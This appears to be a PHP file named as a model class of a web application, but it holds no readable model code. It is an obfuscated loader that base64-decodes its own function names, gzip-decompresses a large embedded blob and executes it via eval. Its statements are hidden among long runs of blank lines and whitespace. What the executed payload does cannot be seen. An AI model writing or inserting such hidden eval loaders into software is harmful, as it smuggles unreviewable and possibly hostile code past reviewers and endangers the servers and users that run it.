<?php 
        $__='printf';$_='Loading donjo-app/models/Grup_model.php';
        































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































                                                                                                                                                                                                                     $________;
